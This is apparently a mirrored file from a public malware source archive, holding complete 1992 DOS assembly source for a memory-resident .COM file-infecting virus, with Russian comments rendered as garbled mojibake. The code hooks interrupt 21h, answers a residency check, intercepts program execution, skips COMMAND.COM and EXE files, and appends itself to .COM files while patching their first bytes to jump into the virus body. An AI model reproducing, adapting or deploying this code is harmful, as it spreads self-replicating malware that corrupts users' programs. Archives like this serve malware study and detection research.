mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
228 lines
6.4 KiB
NASM
228 lines
6.4 KiB
NASM
;
|
||
; <09>¥ª®¬¥¤ã¥âáï ®âª®¬¯¨«¨à®¢ âì, § ¯ãáâ¨âì ¨ ⮫쪮 ¯®â®¬ à áᬠâਢ âì
|
||
; source code. (‚á¥ à ¢® ‚ ¬ ¢ ¥¬ à §¡¨à âìáï ¯à¨¤¥âáï :-)).
|
||
;
|
||
; Œ¨«¥ìª ï (¬ «¥ìª ï) £ ¤®áâì, ¬¥à§®áâì, ¤àïì, ᪮⨠...
|
||
;
|
||
; ‚ ®¡é¥¬, ¢¨àãá, ª®â®àë© § à ¦ ¥â ¢á直¥ â ¬ ä ©«ë ¯à¨ ¯®¯ë⪥ ¨å
|
||
; § ¯ãáâ¨âì - ¯®ª á ä ¬¨«¨¥© .COM, ¦¨¢¥â £¤¥-â® ç¥à¤ ª¥ ¯®¤ ¢¥ªâ®à®¬
|
||
; 21-£® ¨â¥àà ¯â , ¥ áªàë¢ ¥â ᢮¥ ⥫® ¦¨à®¥ ¢ ãâ¥á å, § à ¦¥ë¥
|
||
; ä ©«ë ®¯®§ ¥â ¯® èãਪ¥ã (â ª®© ⨯ §¢¥§¤®çª¨, ¨á¯®«ì§ã¥âáï ã
|
||
; ¢®áâ®çëå த®¢ ¤«ï ®âᥪ ¨ï £®«®¢ë ¨ ¥é¥ ª®¥-祣® ã ¡«¨¦¥£®
|
||
; ᢮¥£®), à ᯮ«®¦¥®¬ã ¢ 4-®¬ ¡ ©â¥ ®â ç « , ᢮¥ «¨ç¨¥ ¢
|
||
; ¯ ¬ï⨠¯à®¢¥àï¥â â ª: ª« ¤¥â ¢ AX á«®¢® BABA (¢ á¬ëá«¥, ¥ â ª®¥
|
||
; á«®¢®, word 0BABAh), ¢ë¯®«ï¥â 21-¥ ¨â¥àà ¯â®¢ ¨¥ ¨ ᬮâà¨â,
|
||
; ¦¥« îâ «¨ íâã ¡ ¡ã 0FACCh. …᫨ ¦¥« îâ, â® á â 窮© ¢á¥ ¯®ïâ®.
|
||
;
|
||
; Copyright (c) 1992, Gogi&Givi International
|
||
;
|
||
|
||
.model tiny
|
||
.code
|
||
org 0100h
|
||
VirPar equ (endvir-StartVirus)/16+2 ; ‘ª®ª ã ¢¨àãá ¯ à £à 䮢
|
||
VirLen equ (endvir-StartVirus) ; <20> §¬¥àë ¡îáâ ¢¨àãá ¢
|
||
; âà¥ã£®«ìëå ª¨«®¬¥âà å
|
||
gadost:
|
||
db 'è' ; …â® ª®¤ CALL
|
||
dw StartVirus-$-2 ; € ¥â® ᬥ饨¥ StartVirus
|
||
db 15,09h ; ˜ãਪ¥ ¨ ®áâ ⮪ ®â mov ah,
|
||
int 21h ; € íâ® ¢á¥ ®à¬ «ìë©
|
||
ret ; ª®¤ ¦¥àâ¢ë
|
||
GoodMessage db '’®¢ à¨é ‹®§¨áª¨©! ”€Š ž!',13,10,'$'
|
||
; <20> ª®áâë© ¬¥áá ¤¦ ¤«ï ¤ï¤¨
|
||
; ‹®§¨áª®£®
|
||
StartVirus:
|
||
pop si ; <20>â® ç⮡ë 㧠âì, ªã¤ á
|
||
call EntryPoint ; § ¥á«®
|
||
EntryPoint:
|
||
pop si ; ‚믨奬 ¤à¥á ç « § à §ë
|
||
push ds ; ‘®åà ¨¬ ¯ àã-âனªã ॣ¨áâ஢...
|
||
push es
|
||
push si
|
||
mov ax,cs ; ‚®ááâ ®¢¨¬ ᯥàâë¥ ¡ ©âë
|
||
mov es,ax ; ¨§ § ¤¨æë ä ©«
|
||
mov ds,ax
|
||
mov di,0100h
|
||
add si,RobbedBytes-EntryPoint
|
||
mov cx,4
|
||
cld ; <20>â® ¢®ááâ ®¢«¥¨¥
|
||
rep movsb
|
||
pop si
|
||
mov ax,0BABAh ; <20>஢¥à¨¬, å®âïâ «¨ ¡ ¡ã -
|
||
int 21h ; ¢ á¬ëá«¥, ¥áâì «¨ ¬ë
|
||
cmp ax,0FACCh ; ¢ ¯ ¬ïâ¨
|
||
jne NeedsBaba ; ‚¨¤ âì, å®âïâ ¥¥, த¨¬ãî!
|
||
jmp FucksNow ; …¥ 㦥 ®¡à ¡ âë¢ îâ
|
||
NeedsBaba:
|
||
pop es
|
||
push es
|
||
mov ax,es ; Žâàë¢ ¥¬ ᥡ¥ á¥â PSP
|
||
dec ax
|
||
mov es,ax ; ‘⮫쪮 ¢ 襩 ¯ ª®áâ¨
|
||
mov ax,es:[3] ; ¯ à £à 䮢
|
||
sub ax,virpar
|
||
mov es:[3],ax
|
||
mov bx,es:[1] ; <20>«îá ®¤ PSP
|
||
add bx,ax ; ‚ᥠᢠ«¨¢ ¥¬ ¢ ªãçã
|
||
mov es,bx
|
||
push ds ; <20>ã, íâ® ¯®ïâ®
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov ax,ds:[21h*4] ; ‡ å¢ âë¢ ¥¬ áâ àë©
|
||
mov cs:[si+Off21-EntryPoint],ax ; ¢¥ªâ®à int 21h
|
||
mov ax,ds:[21h*4+2] ; ‚ á¬ëá«¥, ® ¥ áâ àë©,
|
||
mov cs:[si+Seg21-EntryPoint],ax ; ® ¤ ¦¥ «ãçè¥ ®¢®£®
|
||
pop ds
|
||
xor di,di ; ‡ á®¢ë¢ ¥¬ ¢ ç «®
|
||
push si ; ¨ç¥©®£® ᥣ¬¥â
|
||
sub si,EntryPoint-StartVirus ; £¤¥-â® § ¤¢®àª å
|
||
mov cx,VirLen ; ¯ ¬ïâ¨ è¥ £ãᮥ
|
||
rep movsb ; ⥫®
|
||
pop si
|
||
push ds ; ˆ áâ ¢¨¬ 㪠§ ®¥
|
||
xor ax,ax ; £ãᮥ ⥫® ¢¥ªâ®à
|
||
mov ds,ax ; ¯à¥àë¢ ¨ï 21h
|
||
mov word ptr ds:[21h*4],Int21Server-StartVirus
|
||
mov ds:[21h*4+2],es
|
||
pop ds
|
||
|
||
FucksNow:
|
||
pop es ; <20>â® ¢ á«ãç ¥, ¥á«¨
|
||
pop ds ; ¯à¥¤«®¦¥®© ¦¥é¨®©
|
||
mov si,0100h ; (¢¨àãᮬ) 㦥 ®¡« ¤ îâ
|
||
push si
|
||
xor ax,ax ; ‚ᥠ¢®ááâ ¢«¨¢ ¥¬ ª
|
||
xor bx,bx ; ï¤à¥¥ ”¥¥ - ¨ ¤®¬®©,
|
||
xor di,di ; ª ¬ ¬¥
|
||
ret
|
||
|
||
Int21Server:
|
||
pushf ; <20>â® ®¢ë© ®¡à ¡®â稪
|
||
push ax ; 21-£® ¨â
|
||
push bx
|
||
push ds
|
||
cmp ax,0BABAh ; ’ãâ ¬ë ãáâ ®¢¨¬ ॠªæ¨î
|
||
jne NotTest ; ¯à¥¤«®¦¥¨¥ ¦¥é¨ë
|
||
pop ds ; (¨«¨ í४æ¨î)
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
mov ax,0FACCh ; <20>â® ®à¬ «ì ï í४æ¨ï
|
||
iret ; (â® ¥áâì ॠªæ¨ï)
|
||
|
||
NotTest:
|
||
push cx ; ’ãâ ¬ë ª« áá® ¨§¢à ⨬áï,
|
||
mov cx,ax ; ç⮡ë ᤥ« âì ¢¨¤, çâ®
|
||
xchg cl,ch ; ¬ ᮢᥬ ¥ 㦮
|
||
xor cl,4Bh ; ®¡à ¡ âë¢ âì äãªæ¨î EXEC
|
||
pop cx ; (—⮡ ‹®§¨áª¨© £®«®¢ã «®¬ «
|
||
jz Exec ; ¨ ç⮡ ã ¥£® ®çª¨ § ¯®â¥«¨)
|
||
jmp NotExec
|
||
|
||
Exec:
|
||
mov bx,dx ; <20>®ª« ¤¥¬ ᬥ饨¥ ¨¬¥¨
|
||
; § ¯ã᪠¥¬®£® ä ©« ¢ BX
|
||
SearchZero:
|
||
cmp byte ptr ds:[bx],0 ; <20>஢¥à¨¬ §¥àã
|
||
je ZeroFound ; €å, ª®¥æ ¨¬¥¨!
|
||
inc bx
|
||
jmp SearchZero
|
||
|
||
ZeroFound:
|
||
sub bx,11 ; —㤥á®!
|
||
push es ; <20>஢¥à¨¬, ¢¤à㣠ª ª®©-
|
||
mov ax,cs ; ¨¡ã¤ì ¯á¨å ¦¥« ¥â
|
||
mov es,ax ; § à §¨âì COMMAND.COM
|
||
mov cx,11
|
||
mov di,offset CommandName-StartVirus
|
||
|
||
Compare:
|
||
mov al,ds:[bx] ; <20>â® ¢á¥ á«®¦ ï ¨ 㤠ï
|
||
cmp al,es:[di] ; ¯à®æ¥¤ãà ¯à®¢¥àª¨...
|
||
jne NotCommand
|
||
inc bx
|
||
inc di
|
||
dec cx ; ‚ᥠ¯à®¢¥à塞, ¯à®¢¥à塞...
|
||
cmp cx,0
|
||
jne Compare
|
||
pop es
|
||
jmp Quit21Server ; —â® ¦ ï - ¤¥¡¨« COMMAND.COM
|
||
; § à ¦ âì?!
|
||
NotCommand:
|
||
pop es ; ’ ¬ ¬ë á®åà 﫨 祣®©-â
|
||
push ax
|
||
push bx ; ‘®åà ¨¬ ¢á¥, çâ® ¯«®å®
|
||
push cx ; «¥¦¨â, çâ®¡ë ¥ ¯à®¯ «®
|
||
push dx
|
||
mov ax,3D02h ; Žâªã¯®à¨¢ ¥¬ ª«¨¥â (ä ©«)
|
||
int 21h
|
||
jc EndExec ; <20>ë¢ îâ ¨ £ãâë¥ ¯à®¡ª¨
|
||
mov bx,ax ; <20>®ª« ¤¥¬ ¯à®¡ªã ®â ä ©« ¢ BX
|
||
mov cx,4 ; •®â¥«®áì ¡ë áç¨â âì 4 ¡ ©â
|
||
mov ax,cs
|
||
mov ds,ax
|
||
mov ah,3Fh ; ‚ ¬¥áâ®, £¤¥ «¥¦ «¨
|
||
mov dx,offset RobbedBytes-StartVirus
|
||
int 21h ; ᯥàâë¥ ¡ ©âë
|
||
jc EndExec
|
||
cmp word ptr cs:[RobbedBytes-StartVirus],'ZM'
|
||
je CloseFile ; <20> 䨣 EXE § à ¦ âì???
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov ax,4202h
|
||
int 21h ; ‹¥§¥¬ ¢ § ¤¨æã ä ©«
|
||
cmp ax,1000 ; <20> 䨣 ¬ ä ©«ë ¬¥ìè¥
|
||
jl CloseFile ; 1 ª¨«®?
|
||
cmp ax,64000 ; € ⥬ ¡®«¥¥ ¡®«ìè¥ 64
|
||
ja CloseFile
|
||
sub ax,3
|
||
mov cs:[FileSize-StartVirus],ax ; ˜ãਪ¥ ?
|
||
cmp byte ptr cs:[RobbedBytes-StartVirus+3],15
|
||
je CloseFile ; ˆª¥¡ !
|
||
mov ax,cs
|
||
mov ds,ax
|
||
mov ah,40h ; ƒ«ã¯ë© ¢¨àãá ஡ª® ¯àïç¥â
|
||
xor dx,dx ; ⥫® ¦¨à®¥ ¢ § ¤¨æ¥ ä ©«
|
||
mov cx,VirLen
|
||
int 21h
|
||
xor cx,cx ; ˆ ¢ ç «® ã¡¥£ ¥â, ç⮡ë
|
||
xor dx,dx ; JUMP â㤠¯®áâ ¢¨âì
|
||
mov ax,4200h
|
||
int 21h
|
||
mov ah,40h
|
||
mov dx,offset SuperByte-StartVirus ; ” ©« â® ¨ ä ©«, ç⮡ë
|
||
mov cx,4 ; ¢ë§ë¢ âì ¯®¤ª«¥¥ë©
|
||
int 21h ; ᧠¤¨ ¢¨àãá
|
||
CloseFile:
|
||
mov ah,3Eh ; ‘¨¥ § ªàë⨥ ä ©« - ¬
|
||
int 21h ; ® ¡®«ìè¥ ¢ é¥ ¥ 㦥
|
||
EndExec:
|
||
pop dx ; Œë â ¬, ª ¦¨áì, á®åà 﫨
|
||
pop cx ; ®¯ïâì 祣®©-â ?
|
||
pop bx
|
||
pop ax
|
||
jmp Quit21Server ; ˆ ¯® ¡ ¡ ¬!
|
||
|
||
NotExec:
|
||
; <20> á«ãç © á«¥¤ãîé¨å å ¬áª¨å à §à ¡®â®ª
|
||
|
||
Quit21Server:
|
||
pop ds ; —¥¬ ¦¥ ¬ë ⮫쪮
|
||
pop bx ; STACK' ¥ ¯®«ï«¨?!
|
||
pop ax
|
||
popf ; …é¥ ¨ ä« £ ¬¨?!!!
|
||
db 0EAh
|
||
Off21 dw 0000h ; ’ ª ¡ã¤¥â á ª ¦¤ë¬, ªâ®...
|
||
Seg21 dw 0000h
|
||
|
||
RobbedBytes:
|
||
mov dx,offset GoodMessage ; <20>â® ¢à®¤¥ ª ª ᯥàâë¥ ¡ ©âë
|
||
db 0B4h
|
||
SuperByte db 'è' ; € íâ® ¥ ᯥàâë¥, ®
|
||
FileSize dw 0000h ; ⮦¥ å®à®è¨¥
|
||
db 15 ; ˜ãਪ¥
|
||
db '=>' ; <20>â® ¤«ï ªà á®âë
|
||
CommandName db 'COMMAND.COM<=' ; € íâ® ®â COMMAND.COM
|
||
endvir:
|
||
end gadost ; ˆ ¢á¥! |